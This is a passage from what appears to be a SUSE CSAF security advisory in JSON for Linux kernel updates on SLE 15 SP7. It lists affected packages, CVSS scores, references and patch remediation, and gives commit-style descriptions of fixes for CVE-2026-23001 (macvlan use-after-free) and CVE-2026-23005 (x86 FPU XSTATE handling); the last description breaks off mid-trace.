"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at 